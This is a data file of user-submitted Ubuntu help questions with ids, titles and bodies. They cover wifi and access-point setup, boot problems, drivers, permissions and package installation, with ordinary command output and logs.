332969	what documentation and help resources are available for setting and examining ufw rules ?	the guy who wrote ufw is too smart for me . is there any documentation for any of the python code ? some things i 'm trying to do are : allow/close ports by number get the currently set rules remove rules edit : my question was n't specific enough . everyone here is assuming that i somehow want to reinvent my own interface to iptables , or make some kind of firewall application , when really , i 'm just creating a simple ui for ufw that fits into my current application . however , the current state of the ufw python code base makes this a lot harder than it needs to be .
332970	why my softap disconnected and connected frequently ?	i have setup softap using hostapd and dhcp3-server , $ sudo ifconfig wlan0 192.168.0.1 netmask 255.255.255.0 $ sudo dhcpd wlan0 -pf /var/run/dhcp-server/dhcpd.pid internet systems consortium dhcp server 4.2.4 copyright 2004-2012 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ wrote 2 leases to leases file . listening on lpf/wlan0/88:9f : fa : f8:79:83/192.168.0.0/24 sending on lpf/wlan0/88:9f : fa : f8:79:83/192.168.0.0/24 sending on socket/fallback/fallback-net ca n't create pid file /var/run/dhcp-server/dhcpd.pid : permission denied . $ sudo bash -c `` echo 1 > /proc/sys/net/ipv4/ip_forward '' $ sudo iptables -t nat -a postrouting -o eth0 -j masquerade ~ $ cat hostapd-myconfig.conf # change wlan0 to your wireless device interface=wlan0 # bridge=br0 driver=nl80211 ssid=myap hw_mode=g channel=11 macaddr_acl=0 auth_algs=3 # ignore_broadcast_ssid=0 wpa=3 wpa_passphrase=password # wpa_key_mgmt=wpa-psk wpa-eap wpa_key_mgmt=wpa-psk wpa_pairwise=ccmp rsn_pairwise=ccmp $ tail /etc/dhcp/dhcpd.conf # } subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.2 192.168.0.10 ; option routers 192.168.0.1 ; option domain-name-servers 8.8.8.8 ; } $ sudo hostapd hostapd-myconfig.conf [ sudo ] password for victor : configuration file : hostapd-myconfig.conf failed to update rate sets in kernel module using interface wlan0 with hwaddr 88:9f : fa : f8:79:83 and ssid 'myap' wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : disassociated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : ap-sta-connected 88:53 : d4:26 : c4:14 wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000000 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000001 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000002 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000003 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000004 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000005 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000006 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000007 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000008 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-00000009 wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta ac : f7 : f3 : e0:00:5f ieee 802.11 : authenticated wlan0 : sta ac : f7 : f3 : e0:00:5f ieee 802.11 : associated ( aid 2 ) wlan0 : ap-sta-connected ac : f7 : f3 : e0:00:5f wlan0 : sta ac : f7 : f3 : e0:00:5f radius : starting accounting session 520cdfb8-0000000a wlan0 : sta ac : f7 : f3 : e0:00:5f wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-0000000b wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-0000000c wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : authenticated wlan0 : sta 88:53 : d4:26 : c4:14 ieee 802.11 : associated ( aid 1 ) wlan0 : sta 88:53 : d4:26 : c4:14 radius : starting accounting session 520cdfb8-0000000d wlan0 : sta 88:53 : d4:26 : c4:14 wpa : pairwise key handshake completed ( rsn ) then i used my phone to connect this softap , but the wifi connection dropped frequently , how to prevent ? i am using ubuntu 13.04 64bit .
332972	how can i use the value from a pipe in the test program ?	wc -l | test -eq 1 this does n't work . i want to compare the result of wc with the value of 1 . how can i do that ?
332983	lenovo ideapad y560p ubuntu overheat , video not working properly	i have a lenovo ideapad y560p , it has an ati radeon hd 6570m . the problem is the overheat , it reaches 59 degrees after just only turning on the computer . the other thing , is the video , it is n't smooth as it should be . i installed ubuntu 12.04 lts and i tried all ati open-source driver and the latest ati proprietary driver . i think that the open-source worked a bit better but it sucks anyway . i believe that this is a problem with almost all computers with ati radeon videocards . is there a solution ? thanks in advance
332984	backup strategy	when backing up ubuntu 12.04 is it necessary to backup system files outside of the home folder ? i have had a grub installation become corrupted by a subsequent update . i need a strategy to recover from errant updates . that is , to roll back my updates .
332986	ubuntu boot error : kernel image not found	i 've been trying to install ubuntu 13.04 ( raring ringtail ) from my fat formatted usb installed with unetbooting and i got the error no kernel image found : i ran md5sums on the iso image , and it tallies but error persists . i formatted the usb drive to fat32 but i got the error no ui directive or config file found any tips on how to solve this ?
332988	disk check dual boot	i am trying to dual boot ubuntu with windows 8 on a new laptop . i have sorted out the flash-drive with the iso , set up with the universal usb installer . i have then set the laptop to boot from flash . when i fire the laptop up i get a grub menu asking me whether i want to try ubuntu , install or check disk . if i try ubuntu or try to install it gets stuck ( installing gets stuck at the screen with ubuntu and the alternating white & orange dots underneath , selecting the try now brings up what looks like a ubuntu desktop but then freezes ) . if i select check disk it tells me that one error is found , which is that it ca n't find : pool/main/g/grub2-signed/grub-efi-amd64-signed_1.9~ubuntu12.04.3+1.99-21ubuntu3.9_amd.deb . having checked the flash drive it seems that this file is indeed there , where it should be . any suggestions are greatly appreciated ... . thanks !
332990	how do i start gnome-terminal with a specific width/height ?	i would like to configure gnome-terminal to start with a bigger window by default . how do i do it ?
332994	gimp 2.8 does n't allow to save usual image file formats ( jpg , png ) via save dialog	i used to save images as usual image file formats ( jpg , png ) by pressing ctrl+s or ctrl+shift+s ( save or save as dialog ) . now in version 2.8 gimp does n't allow it anymore : you can save only as .xcf but to save as .jpg or .png you must export . is there a way to get this old file saving functionality back ?
332997	wi-fi dropping and not finding network until reset	i 'm finding that more and more often recently , ubuntu 13.04 has been disconnecting from my wifi network until i restart , or flip the airplane mode switch on and off . it will disconnect , and then the device will be gone from the list of networks until i restart , when it connects fine .
333000	unable to boot to windows 7 after installing ubuntu on a separate drive	i have searched everywhere on the internet and i can not seem to find a solution to this problem . i have an alienware aurora and with it came windows 7 . recently , i inserted an additional hdd and installed ubuntu on it . upon boot up , i do not have the option of booting to a specific os . i checked and everything is still on the original drive . i even went into my bios and tried to switch the drive from which the computer booted , but there was no option for the original drive . i also tried using boot-repair to no avail . thanks in advance for the help . i realize that similar questions have been asked on these forums but none of them seem to be any help to me . edit : i meant to add that i tried removing the ubuntu drive therefore forcing it to boot to windows . when i did this , it started a grub command line which i am completely unfamiliar with .
333004	are there any security suites available for ubuntu ?	i 'm new to ubuntu , but i 've heard linux , especially ubuntu is an virus free os . still are there any security suites available for ubuntu that could make it more secure ? or do i not need any extra security software ?
333006	unsafe ownership on homedir	i am trying to run gpg on ubuntu 12.04 64 bit lts i get the following error : gpg : warning : unsafe ownership on homedir `/home/jeffrey/.repoconfig/gnupg' gpg : failed to create temporary file `/home/jeffrey/.repoconfig/gnupg/. # lk0x7508c0.jeffrey-satellite-m645.23486 ' : permission denied gpg : keyblock resource `/home/jeffrey/.repoconfig/gnupg/pubring.gpg ' : general error gpg : signature made fri 01 mar 2013 11:36:42 am cst using dsa key id 920f5c65 gpg : ca n't check signature : public key not found error : could not verify the tag 'v1.12.2' my current permissions are : jeffrey @ jeffrey-satellite-m645 : ~ $ ls -dl drwxr-xr-x 37 jeffrey jeffrey 4096 aug 15 10:56 . what should the permissions be set to ? please advise .
333007	how to run commands if unity is not working ?	i 'm running ubuntu 13.04 on a compaq pressario cq56 . after system update unity and terminal will not load . i 've read some forums on how to fix the unity problem but without terminal i ca n't use them , and i 've found forums about the terminal issue but can not fix it without software center which i can not load . i can go into root terminal from recovery mode but that seems to be ready only and will not let me install or modify files . any help i can get to get unity or terminal back would be great . if this is n't possible i 'll just try to copy some data to a flash drive and reinstall .
333014	ubuntu 13.04 scrolling not precise enough , jumps whole pages	each increment of my wireless mouse 's scroll wheel jumps an entire screen worth , this occurs throughout the entirety of ubuntu , i only got it today just trying to get everything working i am not an expert in coding etc
333018	why disk space is not released after deleting virtual disk	i installed ubuntu via wubi with the size of 20gbs . then i decided to increase it to 65 gbs using this guide . then i decided to delete this virtual disk ( 65 gbs ) to increase to about 150gbs . the only thing i did n't follow the guide is that i delete this virtual disk from ubuntu using rm command ( the guide seems mentioned to delete it from windows in the last step ) after removing this virtual disk , i see the free disk space remained the same ( not increased 65 gbs as expected ) . anyone know how to fix this , so that i can have 65 gbs free space back ? thank you very much
333019	beats audio dv7 hp	who can help me with linux audio problems generally ( i tried ubuntu fedora manjaro ect and i can not make it work on my laptop 4.1 hp dv7-6b77dx ( has 2 speakers under the screen two more in the front and a subwoofer on the bottom next to the baterria ) versions of linux with kernel 3.2 works sub and two speakers from but not those that are on the screen ( hda analyzer here i can make funionen all ) and with the kernel 3.5 onwards operate 4 speakers but no subwoofer ( here i have not been able to work with the hda analizer ) quien me puede ayudar con problemas de audio en linux general ( he probado manjaro ubuntu fedora ect y no puedo hacer que funcione el 4.1 de mi laptop hp dv7-6b77dx ( tiene 2 bosinas bajo la pantalla 2 mas en la parte de enfrente y un subwoofer por la parte de abajo junto a la baterria ) las versiones de linux con kernel 3.2 funciona el sub y las dos bocinas de entre pero no las que estan bajo la pantalla ( aqui con hda analizer puedo hacer que funionen todas ) y con el kernel 3.5 en adelante funcionan las 4 bosinas pero no el subwoofer ( aqui no lo he podido hacer funcionar con el hda analizer )
333026	changing extension of multiple files in ubuntu 12.04	as the title says , how can i change the extension of every file in a directory in ubuntu ? i 've seen some examples use rename etc etc but i get an error ( unable to locate package rename ) and it 's not accessible through apt-get . as an additional , i do n't actually know the original file type ! it 's data that 's been copied from the file system of hadoop to the local drive and i need them all to be in .txt format . if it makes a difference , i 'm running ubuntu 12.04 in oracle virtual box edit : output of : ls -l /usr/bin/rename /etc/alternatives/rename amartin24 @ ubuntu-amartin24 : ~/twittermining/jsontweets $ ls -l /usr/bin/*rename* /etc/alternatives/rename ls : can not access /etc/alternatives/rename : no such file or directory -rwxr-xr-x 1 root root 10392 mar 30 2012 /usr/bin/rename.ul
333037	unable to access “windows”	error mounting /dev/sda3 at /media/dany/data : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda3 '' `` /media/dany/data '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda3 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
333040	update manager stopped meanwhile update-initramfs : generating /boot/initrd.img-3.5.0-37-generic	i just installed ubuntu 12.04 , started the update manager to install the recommended updates . the update manager stopped at this line : update-initramfs : generating /boot/initrd.img-3.5.0-37-generic the cursor is blinking , but nothing happened in the last 15 minutes . what should i do ? ( i 'm new to ubuntu )
333049	parallel port not working with an hp laserjet 6p	i 'm working on setting up an old printer ( hp laserjet 6p ) on some old hardware ( gateway e4300 ) running precise ( 12.04 lts ) . when i try to select the parallel port in hp-setup -i , it gives me the following error : $ sudo hp-setup -i -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- | select connection ( i/o ) type | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- num connection description type -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 0* usb universal serial bus ( usb ) 1 net network/ethernet/wireless ( direct connection or jetdirect ) 2 par parallel port ( lpt : ) enter number 0 ... 2 for connection type ( q=quit , enter=usb* ) ? 2 using connection type : par error : no device selected/specified or that supports this functionality . things i 've checked so far : 1 ) the printer is plugged in and connected . 2 ) the printer is turned on . 3 ) the parallel port is enabled in the bios . 4 ) the parallel port mode is not set in the bios ( no option to do so ) . 5 ) the parallel port modules are loaded . output of lsmod , trimmed to relevant bits : wdmartin @ woot : ~ $ lsmod module size used by ppdev 12850 0 lp 17456 0 parport 40931 3 ppdev , parport_pc , lp parport_pc 32115 1 6 ) /dev/lp0 and /dev/parport0 exist : $ ls -hal /dev/lp0 /dev/parport0 crw-rw -- -- 1 root lp 6 , 0 aug 15 11:58 /dev/lp0 crw-rw -- -- 1 root lp 99 , 0 aug 15 11:58 /dev/parport0 7 ) my user is a member of the lp and lpadmin groups : $ groups wdmartin adm lp cdrom sudo dip plugdev lpadmin sambashare 8 ) dmesg shows the parallel port driver loaded : [ 17.206314 ] parport_pc 00:08 : reported by plug and play acpi [ 17.206349 ] parport0 : pc-style at 0x378 , irq 7 [ pcspp , tristate , epp ] [ 17.317279 ] lp0 : using parport0 ( interrupt-driven ) . [ 17.527946 ] ppdev : user-space parallel port driver 9 ) lspci does not show the parallel port : $ lspci 00:00.0 host bridge : intel corporation 82915g/p/gv/gl/pl/910gl memory controller hub ( rev 04 ) 00:02.0 vga compatible controller : intel corporation 82915g/gv/910gl integrated graphics controller ( rev 04 ) 00:02.1 display controller : intel corporation 82915g integrated graphics controller ( rev 04 ) 00:1b.0 audio device : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) high definition audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 3 ( rev 03 ) 00:1c.3 pci bridge : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) pci express port 4 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 3 ( rev 03 ) 00:1d.3 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb uhci # 4 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 pci bridge ( rev d3 ) 00:1f.0 isa bridge : intel corporation 82801fb/fr ( ich6/ich6r ) lpc interface bridge ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) ide controller ( rev 03 ) 00:1f.2 ide interface : intel corporation 82801fb/fw ( ich6/ich6w ) sata controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801fb/fbm/fr/fw/frw ( ich6 family ) smbus controller ( rev 03 ) 02:00.0 ethernet controller : marvell technology group ltd. 88e8050 pci-e asf gigabit ethernet controller ( rev 17 ) 05:05.0 firewire ( ieee 1394 ) : lsi corporation fw322/323 ( rev 61 ) why does n't the parallel port show up in lspci ? does that mean the parallel port is not working , despite everything else looking good ? i 've tried configuring the printer via cups rather than using hp-setup , and it appeared to accept the settings , and take a print job , but no actual printing occurred . any suggestions would be welcome .
333056	subtitle overlapping : how to comparing two timelines in subtitles ( e.g . 00:18:06 vs 00:16:01 ) and overwriting one of them if it 's overlapping ?	i have a series of srt files ( film subtitles ) that some of their time-lines overlap each others on the video ! this means that some of time-lines are displayed about 1-2 seconds longer than they are in the film and conflict with the next ones ! for example : 1 00:00:01.000 -- > 00:00:07.000 the following content is provided 2 00:00:04.000 -- > 00:00:10.000 under a creative commons license . '07 ' overlaps '04 ' ! i want to overwrite the first part of time-lines on the 2nd part of their previous line . be care that all time-lines do not interfere with each other . some of them are correct and shorter than their next timeline ! the interference is only to some of them .
333063	restart network interface after editing /etc/network/interface	restart the network service : service networking restart when i give the above command i get something like stop : unknown instance : networking stop/waiting i would like to know if the network services has restarted or is it showing some errors . if it is an error how to rectify it ?
333067	how can i create a cp932 encoded text file on ubuntu ?	is there a way to create a cp932 encoded file on ubuntu ?
333071	where are profiles stored in wine 1.6 ?	i am running several programs via wine 1.6 , and i need to get into the data that they would normally store under the users profile in windows , i.e. , the `` appdata/local '' folder . everywhere i have looked says that this is in the `` profiles '' folder in .wine/drive_c/windows . but i do not have a `` profiles '' folder there . i have looked and looked , but no where can i find the user profiles that are stored for wine programs . anybody help me out ?
333073	ubuntu & win8 help !	i want to install the ubuntu 12.04.2 in my computer , which already has windows 8 . i have no idea how to do it , i can not understand a single word of the other post since i 'm new in all this . can somebody help me using easy lenguage ( and pictures if possible ) , please ?
333075	its weird but i think my pc is interfering my phone to connect to the wireless network ( both pc and phone using same router ) ?	before i installed ubuntu 13.04 there was no problem . then this thing happend . when my laptop is running and wifi is enabled ( ofcourse there is internet access on pc ) my android galaxy s2 phone ca n't connect to the wifi router . says '' obtaining ip address ' '' but never obtains . as soon as pc turns off or wifi is disabled , phone automatically connects to wifi . i am sure about this because my brother 's got android too and same exact thing happens with his phone too . i googled for ip conflicts and did few sudos on terminal but all the same . ps im a freshman on linux system . i used windows 8 before ubuntu . my router is one of tp-link . : model == > tl-wr740n below are two screen shots of terminal command output you ( eliah kagan ) mentioned . when phone connected first to network then pc , network signal is shown on phone ca n't load webpages.stuck ! ! i did n't do any firmware upgrades or any changes on router . i admin the router . yes there is dhcp setting on my computer .
333078	ubuntu 12.04 rename folders in mnt & media	installing a new vpn on a new workstation and it has been a year since i did my last virtualbox setup . everything works but i do n't like how the shared folders in media are labeled as sf_folder . i was curious to know can i rename these folders or would it cause issues ? i did n't see a solution or any documentation on it from a search . setup is now windows 7 and ubuntu 12.04 running virtualbox . this may be another question but after the initial install and setup of shared folders and guest additions i only see a folder in media and not mnt . i can get a shared folder in mnt with sudo ln -sf /media/folder /mnt/ but i do n't know yet if there 's a better way yet .
333079	completely remove ubuntu and partitions from mac os x lion	i could n't make the wifi work on ubuntu 12 after installing alongside os x for a try . i tried everything and nothing worked , now i 'd like to completely remove it since it 's too complicated , is it safe to just remove the partitions it created ?
333085	error while installation ubuntu	following is the error message shown : ( : ( 08-16 01:00 debug downloader : download start filename=c : \ubuntu\install\md5sums-metalink.gpg , url=http : //releases.ubuntu.com/13.04/md5sums-metalink.gpg , basename=md5sums-metalink.gpg , length=198 , text=none 08-16 01:00 debug downloader : download finished ( read 198 bytes ) 08-16 01:00 info saplog : verified a signature from id : '46181433fbb75451 ' . 08-16 01:00 info saplog : checking block bindings.. 08-16 01:00 info saplog : key verified successfully . 08-16 01:00 debug commonbackend : metalink md5sums : e578445ee73cc1641834fca2542a90ba *ubuntu-13.04-desktop-amd64+mac.metalink 6b2e76fe8853d019d66c34fb0bbaa574 *ubuntu-13.04-desktop-amd64.metalink 02c9c64dcd3359d5224612ed8097adcf *ubuntu-13.04-desktop-i386.metalink eff9dda8b3a9d69c88f6703729d50174 *ubuntu-13.04-server-amd64+mac.metalink afafb246cd2ef1ab04803cac3ec554ac *ubuntu-13.04-server-amd64.metalink 98f94e110e069b936fa5ed229136464b *ubuntu-13.04-server-armhf+omap4.metalink 9d09bf70b2a640e12ee8e510d64a553e *ubuntu-13.04-server-i386.metalink 08-16 01:00 error commonbackend : the md5 of the metalink does match 08-16 01:00 error commonbackend : can not authenticate the metalink file , it might be corrupt none 08-16 01:00 debug tasklist : # # # # finished get_metalink 08-16 01:00 debug tasklist : new task get_file_md5 08-16 01:00 debug tasklist : # # # # running get_file_md5 ... 08-16 01:01 debug tasklist : # # # # finished get_file_md5 08-16 01:01 error commonbackend : invalid md5 for iso c : \ubuntu\install\installation.iso ( 5d5d1a7da2a0659b163d4f8bd70fbe6f ! = e68974cc2f12a14d017615b48aa27527 ) none 08-16 01:01 debug tasklist : # # # finished check_iso 08-16 01:01 debug tasklist : # # finished use_cd 08-16 01:01 debug tasklist : # # running extract_kernel ... 08-16 01:01 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 08-16 01:01 debug tasklist : # cancelling tasklist 08-16 01:01 debug tasklist : # finished tasklist 08-16 01:01 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 122 , in select_task file `` \lib\wubi\application.py '' , line 228 , in run_cd_boot file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files
333088	customize nemo keyboard shortcuts in ubuntu 13.04	i 'm on ubuntu 13.04 and ran through the steps outlined on completely integrate nemo in ubuntu . i understand that nemo is a cloned-fork off of nautilus and was hoping that i 'd be able to adjust the keyboard shortcuts for it in the same way ... for nautilus we can edit the `` accels '' file at ~/.config/nautilus/accels . does nemo not have this ability ? the version of nemo on my system is 1.8.2 .
333093	archive.ubuntu.com deb file missing . how do i find it ?	i ca n't install a package because it needs this one which is missing : fails to install because this is n't found : http : //archive.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6-i386_2.15-0ubuntu10.3_amd64.deb can i find it ? a substitute ? is it possible & okay to force install of the package i was trying to without this one ?
333095	install a more recent version of git on a lts	i ca n't upgrade my lucid lynx 10.04 lts because newer distributions of ubuntu do n't work on that computer . i need to install a git version 1.7.10 for credential management . git version is 1.7.0.4 on 10.04 lts : $ dpkg -l *git* +++-==============-==============-============================================ ii git-core 1:1.7.0.4-1ubu fast , scalable , distributed revision control is there a way or a backport to install git 1.7.10 or newer ?
333099	problems with video card or motherboard	i am using a sony vgn-sz32cp laptop , which is equipped with a nvidia geforce go 7400 video card with a 128mb memory , and a integrated card which is `` intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics '' . everything used to be fine before 3.0 , but since it released , the computer has never ever used the nvidia card , but the intel 's instead . the system seems does n't detect it at all . here is the lspci result : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mo`enter code here`bile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation nm10/ich7 family high definition audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation nm10/ich7 family pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation nm10/ich7 family pci express port 2 ( rev 02 ) 00:1c.2 pci bridge : intel corporation nm10/ich7 family pci express port 3 ( rev 02 ) 00:1c.3 pci bridge : intel corporation nm10/ich7 family pci express port 4 ( rev 02 ) 00:1d.0 usb controller : intel corporation nm10/ich7 family usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation nm10/ich7 family usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation nm10/ich7 family usb uhci controller # 3 ( rev 02 ) 00:1d.3 usb controller : intel corporation nm10/ich7 family usb uhci controller # 4 ( rev 02 ) 00:1d.7 usb controller : intel corporation nm10/ich7 family usb2 ehci controller ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e2 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801g ( ich7 family ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7-m family ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation nm10/ich7 family smbus controller ( rev 02 ) 06:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 ) 07:00.0 ethernet controller : marvell technology group ltd. 88e8036 pci-e fast ethernet controller ( rev 15 ) 09:04.0 cardbus bridge : texas instruments pcixx12 cardbus controller 09:04.1 firewire ( ieee 1394 ) : texas instruments pcixx12 ohci compliant ieee 1394 host controller 09:04.2 mass storage controller : texas instruments 5-in-1 multimedia card reader ( sd/mmc/ms/ms pro/xd ) as you can see , the nvidia card is not on the list .
333108	invalid filename issue when i transfer files on ubuntu to the external drive	i backup files on ubuntu 12.04 to the external drives . the wd external drive works well . but the maxell external drive can not recongnize some files names , such as the saved .html files with '| ' or '/ ' . but these files names are fine in ubuntu , and these names are automatically saved when i save from opened html pages . i do not want to change them one by one . any solution ?
333109	upgrading to python 2.7.5 on ubuntu 12.04	ubuntu 12.04 comes with python v 2.7.3 by default . i want to upgrade it to v 2.7.5 . i tried the instructions given in this question , sudo apt-get install build-essential sudo apt-get install libreadline-dev libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev cd ~/downloads/ wget http : //python.org/ftp/python/2.7.5/python-2.7.5.tgz tar -xvf python-2.7.5.tgz cd python-2.7.5 ./configure make sudo make altinstall the last command fails with the error : ... compiling /usr/local/lib/python2.7/xmlrpclib.py ... compiling /usr/local/lib/python2.7/zipfile.py ... make : *** [ libinstall ] error 1 how can i make this upgrade ?
333114	mythbuntu minimum requrements include dvd player or flash drive boot	mythbuntu is installed from an iso file that is al little larger than can be burned to a cd rom . while every computer for the past decade was bult to use cd roms , not every server was built with a dvd player or to boot from a flash drive . the fix for the oversized iso is to written to burn to a dvd or flash drive . please let me know what files on the mythbuntu 12.04 iso contain software downloadable later so can be easily removed in order to get the size do to one that can be written to a cd . thanks
333115	gwibber brings me to system settings	so today i decided to install gwibber but , when i try to add accounts it brings me to here : edit : woops what do i do ?
333116	2008 macbook wifi does n't work with ubuntu 13.04	i had mac os x 10.5 leopard installed on my macbook . it was getting slow , so i backed it up and installed ubuntu 13.04 . but now my wifi does n't work .
333117	thumbnails of images larger then 10mb are not displayed	modern day photography creates larger file sizes however i 'm experiencing an issue where thumbnails of images larger then 10mb are not being displayed . is there something i can do to fix this ?
